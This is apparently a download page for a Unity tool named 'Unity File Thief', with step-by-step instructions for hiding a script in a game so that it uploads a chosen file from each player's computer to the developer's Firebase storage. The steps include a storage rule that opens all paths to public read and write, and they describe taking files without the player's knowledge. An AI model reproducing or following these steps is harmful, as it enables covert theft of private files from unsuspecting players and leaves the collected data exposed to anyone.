A downloadable tool


Unity File Thief

In Unity, Take a file on the computer and sent them to your firebase storage. Collect files on a spesific location.

Set Up

1- Open your new Unity Project
2- Go to : https://console.firebase.google.com/ , If you dont have any account, Sing Up
3- Add new Project on firebase ; enter a name, Select default account for firebase
4- Select Unity under the "Get started by adding Firebase to your app" text.
5- Choose a register type.
6- Download config file (2nd step) and SDK zip (3th step).
7- Go to Your Project Console and open -> Build>Storage -> Get Started -> Next -> Done
8- Under the "Storage" text, select Rules.
9- Delete the texts of Rules File. And Copy and Paste that Rule :

rules_version ='2';   service firebase.storage{     match /b/{bucket}/o {       match /{allPaths=**} {         allow read, write:if true;       }     }   }   

10- Create a new folder. Name of the folder should be "StreamingAssets" not with (") - (NAME IS IMPORTANT)
11- Add config file to that folder. (Config file in the 6th step of the set up)
12- Extract the Firebase SDK zip and hold FirebaseStorage.unitypackages and drop to project panel on the unity
13- Import all
14- Create new GameObject and add fileThieff.cs to your GameObject
15- Go to Firebase Storage of the YourProject Panel again. There is a copy button Left side of the Upload file
16- Click Copy button or copy that Url which starts with gs (example -> gs://file-thied.appspot.com )
17- Turn to our script. Find that code line "StorageReference storageRef = storage.GetReferenceFromUrl("gs://file-thied.appspot.com/").Child(storagePath);"
18- Delete that part ""gs://file-thied.appspot.com/"" and paste your Url
19- Select the path which file you want to take. Dont get a folder, only file.
20- Under the Start Method, Find UploadFile() Function and write path (example -> "C:\aFile\aText.txt" )
21- Save the Code and Start Your Game.
22- When the users open your game; If they have that file, Our game take its file.
23- Files go to Storage. You can see the documents on that tab.


fileThieff.cs 1 kB

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